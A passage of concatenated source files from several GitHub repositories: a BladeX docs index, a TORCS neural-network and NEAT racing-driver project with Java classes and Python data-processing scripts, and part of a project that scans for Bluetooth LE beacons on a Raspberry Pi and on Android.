"content_id": "9b3740f532f35fd8880f4af4a49be6a82fdf0c7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 997, "license_type": "permissive", "max_line_length": 117, "num_lines": 53, "path": "/docs/source/index.rst", "repo_name": "mahgadalla/BladeX", "src_encoding": "UTF-8", "text": "Welcome to BladeX's documentation!\n===================================================\n\nDescription\n^^^^^^^^^^^^\n\nBladeX is a Python package for blade generation.\n\n\nInstallation\n--------------------\nBladeX requires numpy, scipy, matplotlib, and sphinx (for the documentation). They can be easily installed via pip. \n\n\nThe `official distribution <https://github.com/mathLab/BladeX>`_ is on GitHub, and you can clone the repository using\n::\n\n git clone https://github.com/mathLab/BladeX\n\nTo install the package just type:\n::\n\n python setup.py install\n\nTo uninstall the package you have to rerun the installation and record the installed files in order to remove them:\n\n::\n\n python setup.py install --record installed_files.txt\n cat installed_files.txt | xargs rm -rf\n\n\n\n\nDeveloper's Guide\n--------------------\n\n.. toctree::\n :maxdepth: 1\n\n code\n contact\n contributing\n LICENSE\n\n\n\nIndices and tables\n^^^^^^^^^^^^^^^^^^^^^^^^\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n" } ]
4
wbwvos/torcsproject2015
https://github.com/wbwvos/torcsproject2015
b67a2ddb42aeab002303ef83547f4239fa638716
dcdfff125e41c4820377f59bc09b81202fb4117c
a09737590fded40ee13c60d164e2fd13f762b1c8
refs/heads/master
2021-01-10T01:37:27.525467
2015-12-01T13:03:49
2015-12-01T13:03:49
46,572,009
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6047101616859436, "alphanum_fraction": 0.6105072498321533, "avg_line_length": 23.42477798461914, "blob_id": "27b33f5dfde5dc911c0c49250c666290a7c907d7", "content_id": "a9c304997af7ebd46d05c0767a1cc857e7f3152a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2760, "license_type": "no_license", "max_line_length": 72, "num_lines": 113, "path": "/src/trainingdatawriter.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "import java.io.FileWriter;\nimport java.io.IOException;\n\nimport cicontest.torcs.client.Action;\nimport cicontest.torcs.client.SensorModel;\n\npublic class trainingdatawriter {\n\t\n\tpublic FileWriter writer;\n\n\tpublic trainingdatawriter(String filename){\n\t\ttry {\n\t\t\twriter = new FileWriter(filename);\n\t\t} catch (IOException e) {\n\t\t\tSystem.out.print(\"failed to write csv\");\n\t\t\te.printStackTrace();\n\t\t}\n\t\t\n\t\tinitializeCsvFile();\n\t}\n\t\n\tpublic void initializeCsvFile(){\n\t\ttry{\n\t\t\twriter.append(\"Speed\");\n\t\t writer.append(',');\n\t\t writer.append(\"AngleToTrackAxis\");\n\t\t writer.append(',');\n\t\t writer.append(\"DistanceFromStartLine\");\n\t\t writer.append(',');\n\t\t writer.append(\"TrackEdgeSensors\");\n\t\t writer.append(',');\n\t\t writer.append(\"FocusSensors\");\n\t\t writer.append(',');\n\t\t writer.append(\"TrackPosition\");\n\t\t writer.append(',');\n\t\t \n\t\t writer.append(\"accelerate\");\n\t\t writer.append(',');\n\t\t writer.append(\"brake\");\n\t\t writer.append(',');\n\t\t writer.append(\"steering\");\n\t\t writer.append(',');\n\t\t \n\t\t writer.append(\"\\n\");\n\t\t \n\t\t}\n\t\tcatch(IOException e)\n\t\t{\n\t\t\tSystem.out.print(\"could not initialize csv\");\n\t\t e.printStackTrace();\n\t\t} \n\t}\n\tpublic void appendtoCsvFile(SensorModel sensors, Action action)\n\t {\n\t\t\n\t\tString[] datastring = new String[6];\n \tString[] actionstring= new String[3];\n \tdatastring[0] = String.valueOf(sensors.getSpeed());\n \tdatastring[1] = String.valueOf(sensors.getAngleToTrackAxis());\n \tdatastring[2] = String.valueOf(sensors.getDistanceFromStartLine());\n\n \tdatastring[3] = extractvalues(sensors.getTrackEdgeSensors());\n \tdatastring[4] = extractvalues(sensors.getFocusSensors());\n \t\n \tdatastring[5] = String.valueOf(sensors.getTrackPosition());\n\n \tactionstring[0] = String.valueOf(action.accelerate);\n \tactionstring[1] = String.valueOf(action.brake);\n \tactionstring[2] = String.valueOf(action.steering);\n \t\n\t\t\ttry\n\t\t\t{\n\t\t\t \n\t\t\t\tfor(int i=0; i< datastring.length; i++){\n\t\t\t\t\twriter.append(datastring[i]);\n\t\t\t\t writer.append(',');\n\t\t\t\t}\n\t\t\t\t\n\t\t\t\tfor(int i=0; i< actionstring.length; i++){\n\t\t\t\t\twriter.append(actionstring[i]);\n\t\t\t\t writer.append(',');\n\t\t\t\t}\n\t\t\t\t\n\t\t\t writer.append('\\n');\n\t\t\t\t\t\n\t\t\t //generate whatever data you want\n\t\t\t\t\t\n\t\t\t writer.flush();\n\t\t\t //writer.close();\n\t\t\t}\n\t\t\tcatch(IOException e)\n\t\t\t{\n\t\t\t\tSystem.out.print(\"could not append to csv\");\n\t\t\t e.printStackTrace();\n\t\t\t} \n\t \n\t}\n\t\n\tpublic String extractvalues(double[] array){\n \tint length = array.length;\n \t\n \tString result = \"\";\n \tif (length == 0) {\n \t\treturn result;\n \t}\n \tresult += String.valueOf(array[0]);\n \tfor(int i=1;i<length; i++){\n \t\tresult += \",\" + String.valueOf(array[i]);\t\n \t}\n \treturn result;\n }\n\t\n}\n" }, { "alpha_fraction": 0.6508147120475769, "alphanum_fraction": 0.6636983752250671, "avg_line_length": 30.23668670654297, "blob_id": "b209d0cab45b1ddbd57fe38c4f77cf636c793eba", "content_id": "ec7ca7e69988cd926beade3e51419462d4e21ba4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 5278, "license_type": "no_license", "max_line_length": 107, "num_lines": 169, "path": "/src/DefaultDriver.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "import cicontest.algorithm.abstracts.AbstractDriver;\nimport cicontest.torcs.client.Action;\nimport cicontest.torcs.client.SensorModel;\nimport cicontest.torcs.genome.IGenome;\n//import trainNeuralNetwork.NeuralNetwork;\nimport trainNeuralNetwork.NeuralNetwork;\n\npublic class DefaultDriver extends AbstractDriver {\n\t\n//\ttrainingdatawriter datawriter = new trainingdatawriter(\"Self generated training data/trainingdata.csv\");\n\n private NeuralNetwork MyNN;\n private NeuralNetwork speedNN;\n private NeuralNetwork positionNN;\n private NeuralNetwork NeatNN;\n private double targetSpeed;\n private double targetPosition;\n \n @Override\n public void control(Action action, SensorModel sensors) {\n \tthis.directControl(action, sensors);\n// \tthis.indirectControl(action, sensors);\n// \tthis.NEATControl(action, sensors);\n }\n \n @Override\n\tpublic void loadGenome(IGenome genome) {\n \tif (genome instanceof DefaultDriverGenome) {\n \t\tDefaultDriverGenome MyGenome = (DefaultDriverGenome) genome;\n \t\tMyNN = MyGenome.getMyNN();\n \t\tthis.speedNN = MyGenome.getSpeedNN();\n \t\tthis.positionNN = MyGenome.getPositionNN();\n \t\tthis.NeatNN = MyGenome.getNeatNN();\n \t} else {\n \t\tSystem.err.println(\"Invalid Genome assigned\");\n \t}\n }\n\n private double[] getValues(SensorModel sensors){ \n \treturn MyNN.useNN(sensors);\n }\n \n private double[] getNEATValues(SensorModel sensors){ \n \treturn NeatNN.useNN(sensors);\n }\n \n public String getDriverName() {\n return \"simple example\";\n }\n \n \n \n public void controlQualification(Action action, SensorModel sensors) {\n action.clutch = 1;\n action.steering = Math.random() * (1 - -1) -1;\n action.accelerate = 1;\n action.brake = 0;\n //super.controlQualification(action, sensors);\n }\n \n public void controlRace(Action action, SensorModel sensors) {\n action.clutch = 1;\n action.steering = Math.random() * (1 - -1) -1;\n action.accelerate = 1;\n action.brake = 0;\n //super.ControlRace(action, sensors);\n }\n \n public void defaultControl(Action action, SensorModel sensors){\n action.clutch = 1;\n action.steering = Math.random() * (1 - -1) -1;\n action.accelerate = 1;\n action.brake = 0;\n //super.defaultControl(action, sensors);\n }\n \n \n\t@Override\n\tpublic double getAcceleration(SensorModel sensors) {\n\t\tdouble acceleration = 0;\n\t\tdouble speedDiff = this.targetSpeed - sensors.getSpeed();\n\t\tif (speedDiff > 20) {\n\t\t\tacceleration = 1;\n\t\t} else if (speedDiff > 0) {\n\t\t\tacceleration = speedDiff / 20;\n\t\t}\n\t\treturn acceleration > 1 ? 1 : acceleration;\n\t}\n\t\n\tpublic double getBrake(SensorModel sensors) {\n\t\tdouble brake = 0;\n\t\tdouble speedDiff = this.targetSpeed - sensors.getSpeed();\n\t\tif (speedDiff < -20) {\n\t\t\tbrake = 1;\n\t\t} else if (speedDiff < 0) {\n\t\t\tbrake = - speedDiff / 20;\n\t\t}\n\t\treturn brake < -1 ? -1 : brake;\n\t}\n\n\t@Override\n\tpublic double getSteering(SensorModel sensors) {\n\t\tdouble steeringReactiveness = 20;\n\t\tdouble steerLock = 2;\n\t double angle = sensors.getAngleToTrackAxis();\n\t\tdouble positionDiff = this.targetPosition - sensors.getTrackPosition();\n\t\tangle += positionDiff * steeringReactiveness;\n\t\tdouble steering = angle/steerLock;\n\t\tif (steering < -1) { \n\t\t\treturn -1;\n\t\t}\n\t\tif (steering > 1) {\n\t\t\treturn 1;\n\t\t}\n\t\treturn steering;\n\t}\n\t\n\tprivate void directControl(Action action, SensorModel sensors) {\n\t\tdouble[] values = getValues(sensors);\n\n\t\tboolean smooth = Math.abs(values[2]) < 0.15;\n \taction.accelerate = smooth && (0.4 > values[0]) ? 0.4 : values[0];\n \taction.brake = 0;\n \taction.steering = smooth ? 0 : values[2];\n \t\n \tSystem.out.print(action.accelerate + \" \");\n// \tSystem.out.print(action.brake + \" \" );\n \tSystem.out.print(values[1] + \" \" );\n \tSystem.out.print(action.steering +\"\\n\");\n\t}\n\t\n\tprivate void NEATControl(Action action, SensorModel sensors) {\n\t\tdouble[] values = getNEATValues(sensors);\n\n \tif(values[1] > values[0]){\n\t\t\taction.accelerate = values[0];\n \t}else{\n \taction.brake = values[1];\n\t\t}\n \taction.steering = values[2];\n \tSystem.out.print(action.accelerate + \" \");\n \tSystem.out.print(action.brake + \" \" );\n \tSystem.out.print(action.steering +\"\\n\");\n\t}\n\t\n\tprivate void indirectControl(Action action, SensorModel sensors) {\n\t\tthis.targetSpeed = Math.abs(this.speedNN.predict(sensors));\n\t\tthis.targetPosition = this.positionNN.predict(sensors);\n\t\tSystem.out.println(this.targetSpeed);\n\t\tdouble minSpeed = this.targetSpeed; //50;\n\t\tif (this.targetSpeed < minSpeed) {\n\t\t\tthis.targetSpeed = minSpeed;\n\t\t}\n\n\t\tSystem.out.println(\"Current Speed: \" + sensors.getSpeed());\n\t\tSystem.out.println(\"Target Speed: \" + this.targetSpeed);\n\t\tSystem.out.println(\"Current Pos: \" + sensors.getTrackPosition());\n\t\tSystem.out.println(\"Target Pos: \" + this.targetPosition);\n\t\t\n\t\tdouble steering = this.getSteering(sensors);\n\t\tboolean smooth = Math.abs(steering) < 0.15;\n\t\taction.accelerate = this.getAcceleration(sensors);\n \taction.brake = this.getBrake(sensors);\n \taction.steering = smooth ? 0 : steering;\n \tSystem.out.print(action.accelerate + \" \");\n \tSystem.out.print(action.brake + \" \" );\n \tSystem.out.print(action.steering +\"\\n\");\n\t}\n}" }, { "alpha_fraction": 0.7186459302902222, "alphanum_fraction": 0.7225305438041687, "avg_line_length": 30.339130401611328, "blob_id": "8b00f51ba80dfdb0a8c1b63a6df058caf1d8677a", "content_id": "c4f650295c15c64c099358c4cb45a045f0666179", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3604, "license_type": "no_license", "max_line_length": 81, "num_lines": 115, "path": "/src/NEAT/NNPopulation.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "package NEAT;\nimport java.util.List;\nimport java.util.Vector;\nimport java.util.Comparator;\nimport java.util.LinkedList;\n\npublic class NNPopulation {\n\n\tprivate List<Species> species;\n\tprivate int populationSize;\n\t\n\tprivate static long innovationNumber = 0;\n\tprivate static final double sameSpeciesThreshold = 3.0;\n\t\n\tpublic NNPopulation() {\n\t\tthis.species = new LinkedList<Species>();\n\t}\n\t\n\tpublic void randomInitialize(int populationSize, int inputs, int outputs) {\n\t\tthis.populationSize = populationSize;\n\t\tNNGenome genome = new NNGenome(inputs, outputs);\n\t\tinnovationNumber = genome.getHighestInnovationNumber();\n\t\tSpecies firstSpecies = new Species();\n\t\tfirstSpecies.setRepresentative(genome);\n\t\tfor (int i = 0; i < populationSize; ++i) {\n\t\t\tfirstSpecies.addGenome(genome);\n\t\t}\n\t}\n\t\n\tpublic void epoch() {\n\t\t//create new species\n\t\tList<Species> newSpecies = new LinkedList<Species>();\n\t\tfor (Species species : this.species) {\n\t\t\tSpecies newSpecie = new Species();\n\t\t\tnewSpecie.setRepresentative(species.getRepresentative());\n\t\t\tnewSpecies.add(newSpecie);\n\t\t}\n\t\t//calculate number of offsprings and number of carried on individuals\n\t\tint carryOnIndividuals = this.calculateOffspringsPerSpecies();\n\t\t//carry on in the new species the best individuals from the previous population\n\t\tList<NNGenome> individuals = this.getBestIndividuals(carryOnIndividuals);\n\t\tfor (NNGenome individual : individuals) {\n\t\t\tthis.speciate(individual, newSpecies);\n\t\t}\n\t\t//produce offsprings from old species and add to new species\n\t\tfor (Species species : this.species) {\n\t\t\tList<NNGenome> offsprings = species.produceOffsprings();\n\t\t\tfor (NNGenome offspring : offsprings) {\n\t\t\t\tthis.speciate(offspring, newSpecies);\n\t\t\t}\n\t\t}\n\t\t//mutate new species\n\t\tfor (Species species : newSpecies) {\n\t\t\tspecies.mutateSpecies();\n\t\t}\n\t\t//set new species to be the species\n\t\tthis.species = newSpecies;\n\t}\n\t\n\tprivate int calculateOffspringsPerSpecies() {\n\t\tdouble[] speciesFitness = new double[this.species.size()];\n\t\tdouble fitnessSum = 0;\n\t\tint index = 0;\n\t\tfor (Species species : this.species) {\n\t\t\tspeciesFitness[index] = species.getFitness();\n\t\t\tfitnessSum += speciesFitness[index];\n\t\t\t++index;\n\t\t}\n\t\t\n\t\t//crossover produces only 75% of offsprings\n\t\tint totalOffsprings = 0;\n\t\tdouble precompute = 0.75 * (double)(this.populationSize) / fitnessSum;\n\t\tfor (int i = 0; i < speciesFitness.length; ++i) {\n\t\t\tint offsprings = (int) Math.round(precompute*speciesFitness[i]);\n\t\t\tthis.species.get(i).allowOffsprings(offsprings);\n\t\t\ttotalOffsprings += offsprings;\n\t\t}\n\t\treturn this.populationSize - totalOffsprings;\n\t}\n\t\n\tprivate List<NNGenome> getBestIndividuals(int count) {\n\t\tVector<NNGenome> individuals = new Vector<NNGenome>(this.populationSize);\n\t\tfor (Species species : this.species) {\n\t\t\tList<NNGenome> genomes = species.getGenomes();\n\t\t\tfor (NNGenome genome : genomes) {\n\t\t\t\tindividuals.add(genome);\n\t\t\t}\n\t\t}\n\t\tindividuals.sort(new Comparator<NNGenome>() {\n\t\t\t@Override\n\t\t\tpublic int compare(NNGenome left, NNGenome right) {\n\t\t\t\treturn (int) (right.getFitness() - left.getFitness());\n\t\t\t}\n\t\t});\n\t\treturn individuals.subList(0, count);\n\t}\n\t\n\tprivate void speciate(NNGenome network, List<Species> allSpecies) {\n\t\tboolean added = false;\n\t\tfor (Species species : allSpecies) {\n\t\t\tdouble compatibility = species.getCompatibility(network);\n\t\t\tif (compatibility < NNPopulation.sameSpeciesThreshold) {\n\t\t\t\tspecies.addGenome(network);\n\t\t\t\tadded = false;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t\tif (!added) {\n\t\t\tSpecies newSpecies = new Species();\n\t\t\tnewSpecies.setRepresentative(network);\n\t\t\tnewSpecies.addGenome(network);\n\t\t\tallSpecies.add(newSpecies);\n\t\t}\n\t}\n}\n" }, { "alpha_fraction": 0.6284558176994324, "alphanum_fraction": 0.643290638923645, "avg_line_length": 26.98113250732422, "blob_id": "03d8a02a6393dee31274ca03086b7b053c87c1cd", "content_id": "3ce5ece14a6745043a3353a39897cadc5d0c7716", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1483, "license_type": "no_license", "max_line_length": 136, "num_lines": 53, "path": "/extractdata.py", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "import sys\n\ndesiredFields = {'speedX': 0, 'angle': 1, 'distFromStart': 2, 'track': 3, 'focus': 4, 'trackPos': 5, 'accel': 6, 'brake': 7, 'steer': 8}\n\ndef transformInput(line):\n if len(line) == 0:\n return None\n #else\n parsedFields = dict()\n inputs = line.strip('\\x00\\n').split('(')[1:]\n for field in inputs:\n splitField = field.strip().strip(')').split(' ')\n if splitField[0] in desiredFields:\n parsedFields[splitField[0]] = ','.join(splitField[1:])\n\n return parsedFields\n\ndef writeInOutFile(outFile, parsedFields):\n outputs = [None] * len(parsedFields)\n for key, value in parsedFields.iteritems():\n outputs[desiredFields[key]] = value\n outputString = ''\n for output in outputs:\n outputString += output + ','\n outFile.write(outputString.strip(',') + '\\n')\n\nif __name__ == '__main__':\n fileName = sys.argv[1]\n\n inFile = open(fileName , 'r')\n outFile = open(fileName[0:len(fileName)-4] + '.csv', 'w')\n\n lineNumber = 0\n parsedFields = dict()\n outFile.write(str(desiredFields) + '\\n')\n for line in inFile:\n if lineNumber < 2:\n lineNumber += 1\n continue\n\n curParsedFields = transformInput(line)\n if not curParsedFields:\n break\n for key, value in curParsedFields.iteritems():\n if key in desiredFields and key not in parsedFields:\n parsedFields[key] = value\n\n if len(parsedFields) == len(desiredFields):\n writeInOutFile(outFile, parsedFields)\n parsedFields.clear()\n\n inFile.close()\n outFile.close()\n" }, { "alpha_fraction": 0.6017699241638184, "alphanum_fraction": 0.6205752491950989, "avg_line_length": 22.789474487304688, "blob_id": "5b65e12836288c3d744efcc5483be6a5442d060b", "content_id": "f83d27d3c5ba8c3d3cbf90e078ba48d264c1cd13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 904, "license_type": "no_license", "max_line_length": 127, "num_lines": 38, "path": "/transformdata.py", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "import sys\n\ndesiredFields = {'speedX': 0, 'angle': 1, 'distFromStart': 2, 'track': 3, 'focus': 4, 'trackPos': 5, 'speed': 6, 'trackPos': 7}\n\ndef transform(curLine, prevLine):\n outLine = prevLine[:len(curLine)-3]\n outLine.append(curLine[0]) #speed\n outLine.append(curLine[27]) #tracPos\n outFile.write(','.join(outLine) + '\\n') \n\nif __name__ == '__main__':\n fileName = sys.argv[1]\n\n inFile = open(fileName , 'r')\n outFile = open(fileName[:len(fileName)-4] + 'new.csv', 'w')\n\n lineNumber = 0\n parsedFields = dict()\n prevLine = None\n outFile.write(str(desiredFields) + '\\n')\n for line in inFile:\n if lineNumber < 1:\n lineNumber += 1\n continue\n\n curLine = line.strip('\\n').split(',')\n if prevLine == None:\n prevLine = curLine\n continue\n \n transform(curLine, prevLine)\n\n prevLine = curLine\n\n transform(prevLine, prevLine)\n\n inFile.close()\n outFile.close()\n" }, { "alpha_fraction": 0.6538240313529968, "alphanum_fraction": 0.6653249263763428, "avg_line_length": 26.571428298950195, "blob_id": "471ab668f31b6edcb8301a2cfedaa17e4584c995", "content_id": "8e5834f3e81439a4523e6acda0837444a0b9214a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1739, "license_type": "no_license", "max_line_length": 83, "num_lines": 63, "path": "/src/DefaultDriverGenome.java", "repo_name": "wbwvos/torcsproject2015", "src_encoding": "UTF-8", "text": "\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.ObjectInputStream;\n\nimport cicontest.torcs.genome.IGenome;\n//import trainNeuralNetwork.NeuralNetwork;\nimport trainNeuralNetwork.NeuralNetwork;\n\npublic class DefaultDriverGenome implements IGenome {\n\t\n private static final long serialVersionUID = 6534186543165341653L;\n \n private NeuralNetwork myNN;;\n \n private NeuralNetwork speedNN;\n private NeuralNetwork positionNN;\n \n public DefaultDriverGenome() {\n \tthis.myNN = deserializeNN(\"DefaultDriver3.ser\");\n this.speedNN = deserializeNN(\"speedNN.ser\");\n this.positionNN = deserializeNN(\"positionNN.ser\");\n }\n \n private NeuralNetwork NeatNN = deserializeNN(\"NEATDriver.ser\");\n \n public NeuralNetwork getMyNN() {\n return myNN;\n }\n \n public NeuralNetwork getSpeedNN() {\n \treturn this.speedNN;\n }\n \n public NeuralNetwork getPositionNN() {\n \treturn this.positionNN;\n }\n \n public NeuralNetwork getNeatNN() {\n \treturn this.NeatNN;\n }\n\n public static NeuralNetwork deserializeNN(String network){\n\t\ttry{\n\t\t\t FileInputStream fileIn = new FileInputStream(\"serialized networks/\" + network);\n\t ObjectInputStream in = new ObjectInputStream(fileIn);\n\t NeuralNetwork neuralnetwork = (NeuralNetwork) in.readObject();\n\t in.close();\n\t fileIn.close();\n\t System.out.println(\"Deserialized Neuralnetwork\");\n\t return neuralnetwork;\n\t }\n\t\tcatch(IOException i){\n\t i.printStackTrace();\n\t return null;\n\t }\n\t\tcatch(ClassNotFoundException c){\n\t System.out.println(\"Class not found\");\n\t c.printStackTrace();\n\t return null;\n\t }\n\t \n\t}\n}\n\n" } ]
6
marquavious/Data-Structures
https://github.com/marquavious/Data-Structures
e4b617ee915e35c1294cd4e982b13647f29e65d7
ff7aed7b50063979e2bd046badc5cbfd22d4e3ad
ce048747d9ef3c90863ca1652e32057e0f8be92e
refs/heads/master
2021-01-20T04:39:39.726967
2017-04-14T20:16:48
2017-04-14T20:16:48
85,622,436
0
0
null
2017-03-20T20:24:50
2017-03-20T19:52:02
2017-03-20T20:24:17
null
[ { "alpha_fraction": 0.761829674243927, "alphanum_fraction": 0.772870659828186, "avg_line_length": 47.769229888916016, "blob_id": "3d304efd3733a035e104630c06fdb6a4877a7258", "content_id": "a9ec159d145e57369d3d9895684e6169930109ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1904, "license_type": "no_license", "max_line_length": 119, "num_lines": 39, "path": "/Class12.md", "repo_name": "marquavious/Data-Structures", "src_encoding": "UTF-8", "text": "### Class 12: Friday, April 14 – Divide-and-Conquer Recursion\n\n**Topics:**\n- [divide-and-conquer]&nbsp;[recursion]: divide, conquer, combine\n- revisit [binary search] to see how it divides and conquers\n- [merge algorithm] and [merge sort]\n\n**Resources:**\n- play with USF's [interactive sorting animations] to follow algorithms step-by-step\n- watch Toptal's [sorting animations] to see how algorithms compare based on input data and read the discussion section\n- watch videos to observe patterns: [9 sorting algorithms], [15 sorting algorithms], [23 sorting algorithms]\n\n**Challenges:**\n- implement merge sort with a separate merge algorithm\n- annotate functions with complexity analysis\n- write unit tests for your sorting algorithms\n - include test cases of varying sizes and edge cases\n\n**Stretch Challenges:**\n- implement [bucket sort] for integers using a divide-and-conquer recursive style\n\n**Project:**\n- [sorting algorithms] with real-world data on Make School's Online Academy\n\n[divide-and-conquer]: https://en.wikipedia.org/wiki/Divide_and_conquer_algorithm\n[recursion]: https://en.wikipedia.org/wiki/Recursion_(computer_science)\n[binary search]: https://en.wikipedia.org/wiki/Binary_search_algorithm\n[merge algorithm]: https://en.wikipedia.org/wiki/Merge_algorithm\n[merge sort]: https://en.wikipedia.org/wiki/Merge_sort\n[bucket sort]: https://en.wikipedia.org/wiki/Bucket_sort\n\n[sorting animations]: https://www.toptal.com/developers/sorting-algorithms/\n[interactive sorting animations]: https://www.cs.usfca.edu/~galles/visualization/ComparisonSort.html\n[3 sorting algorithms]: https://www.youtube.com/watch?v=jHPexHsDxwQ\n[9 sorting algorithms]: https://www.youtube.com/watch?v=ZZuD6iUe3Pc\n[15 sorting algorithms]: https://www.youtube.com/watch?v=kPRA0W1kECg\n[23 sorting algorithms]: https://www.youtube.com/watch?v=rqI6KT6cOas\n\n[sorting algorithms]: http://make.sc/oa-sorting-algorithms\n" }, { "alpha_fraction": 0.670412003993988, "alphanum_fraction": 0.6779026389122009, "avg_line_length": 32.25, "blob_id": "12394066bc88ad1860c7260a66ccabd00d7f81ea", "content_id": "a824cdb2314042e71e9be47bc2f63fd9cf8ec015", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 267, "license_type": "no_license", "max_line_length": 113, "num_lines": 8, "path": "/source/sortsclassnine.py", "repo_name": "marquavious/Data-Structures", "src_encoding": "UTF-8", "text": "\ndef bubble_sort(array):\n input_array = array\n starter_index = 0\n next_index = 1\n\n\n if input_array[starter_index] > input_array[next_index]:\n input_array[starter_index], input_array[next_index] = input_array[next_index], input_array[starter_index]\n" } ]
2
marianmoldovan/cybercamp
https://github.com/marianmoldovan/cybercamp
791450f64a5502e4b57bf63d85b9c3daddec5320
016be69c39a190fb44e434630d5df84cde1c7bcf
838d5e5a4c0edbdef7a70ffdf2950afb0e0d133a
refs/heads/master
2020-06-07T06:47:11.675239
2014-12-07T07:03:24
2014-12-07T07:03:24
27,601,347
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7367303371429443, "alphanum_fraction": 0.747346043586731, "avg_line_length": 22.5, "blob_id": "c99cfd1cc499617720509566297c047d5049dc9b", "content_id": "463b5e9bd36a855be44dbf42c5b90666efc5ed2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 61, "num_lines": 20, "path": "/rpi blescan/test.py", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "import blescan\nimport sys\nimport bluetooth._bluetooth as bluez\nimport time\n\ndev_id = 0\ntry:\n\tsock = bluez.hci_open_dev(dev_id)\n\tprint \"ble thread started\"\nexcept:\n\tprint \"error accessing bluetooth device...\"\n\tsys.exit(1)\nblescan.hci_le_set_scan_parameters(sock)\nblescan.hci_enable_le_scan(sock)\nwhile True:\n\treturnedList = blescan.parse_events(sock, 10)\n\tnewlist = sorted(returnedList, key=lambda k: k['distance']) \n\tfor beacon in newlist:\n\t\tprint beacon\n\ttime.sleep(1)\n\n" }, { "alpha_fraction": 0.7109375, "alphanum_fraction": 0.73046875, "avg_line_length": 24.600000381469727, "blob_id": "9af9df2f394ee0f54354489c59f12bdde1edc40f", "content_id": "b0199ddf8c34f2f61ec5afa54ce09a49b9a9d603", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 256, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BluetoothNotActivatedException.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\n/**\n * Created by marianclaudiu on 5/11/14.\n */\npublic class BluetoothNotActivatedException extends Exception {\n public BluetoothNotActivatedException() {\n super(\"Bluetooth not activated on this device\");\n }\n}\n" }, { "alpha_fraction": 0.7322308421134949, "alphanum_fraction": 0.7375087738037109, "avg_line_length": 32.43529510498047, "blob_id": "dd9641747afdb3654dc1b3c81ac007fa1c81dedb", "content_id": "23a5dbb37ba139b430a35ab16557a10a6d88a922", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2842, "license_type": "no_license", "max_line_length": 172, "num_lines": 85, "path": "/Safe/beacons/src/main/java/com/beeva/beaconsutils/BeaconManager.java", "repo_name": "marianmoldovan/cybercamp", "src_encoding": "UTF-8", "text": "package com.beeva.beaconsutils;\n\nimport android.annotation.TargetApi;\nimport android.bluetooth.BluetoothAdapter;\nimport android.bluetooth.BluetoothManager;\nimport android.content.Context;\nimport android.content.pm.PackageManager;\nimport android.os.Build;\n\nimport java.util.Collection;\nimport java.util.List;\n\nimport uk.co.alt236.bluetoothlelib.device.IBeaconDevice;\n\n@TargetApi(Build.VERSION_CODES.JELLY_BEAN_MR2)\npublic abstract class BeaconManager {\n\n protected static final long SCAN_PERIOD = 5000;\n protected static final long PAUSE_PERIOD = 25000;\n\n private BeaconListener beaconListener;\n private Context context;\n\n private BluetoothManager bluetoothManager;\n private BluetoothAdapter bluetoothAdapter;\n\n public BeaconManager(Context context) throws BluetoothNotSuportedException, BluetoothLENotSuportedException, BluetoothNotActivatedException {\n if(!context.getPackageManager().hasSystemFeature(PackageManager.FEATURE_BLUETOOTH))\n throw new BluetoothNotSuportedException();\n this.context = context;\n bluetoothManager =(BluetoothManager) context.getSystemService(Context.BLUETOOTH_SERVICE);\n bluetoothAdapter = bluetoothManager.getAdapter();\n if (bluetoothAdapter == null)\n throw new BluetoothNotSuportedException();\n if (!bluetoothAdapter.isEnabled())\n throw new BluetoothNotActivatedException();\n if (Build.VERSION.SDK_INT < Build.VERSION_CODES.JELLY_BEAN_MR2 ||\n !context.getPackageManager().hasSystemFeature(PackageManager.FEATURE_BLUETOOTH_LE))\n throw new BluetoothLENotSuportedException();\n }\n\n public static BeaconManager createBeaconManager(Context context) throws BluetoothNotActivatedException, BluetoothLENotSuportedException, BluetoothNotSuportedException {\n if( Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP)\n return new BeaconManagerLollipop(context);\n else return new BeaconManagerJellyBean(context);\n }\n\n /**\n * Start periodicall scanning of Beacons\n */\n public abstract void startPeriodicallScan();\n\n /**\n * Start psingle scan of nearby Beacons. Scanning lasts for 5s.\n */\n\n public abstract void startSingleScan();\n\n public abstract void stopScanning();\n\n public abstract boolean isScanning();\n\n public abstract List<IBeaconDevice> getAllBeaconSeen();\n\n public Context getContext() {\n return context;\n }\n\n public BluetoothManager getBluetoothManager() {\n return bluetoothManager;\n }\n\n public BluetoothAdapter getBluetoothAdapter() {\n return bluetoothAdapter;\n }\n\n public BeaconListener getBeaconListener() {\n return beaconListener;\n }\n\n public void setBeaconListener(BeaconListener beaconListener) {\n this.beaconListener = beaconListener;\n }\n\n}\n" }, { "alpha_fraction": 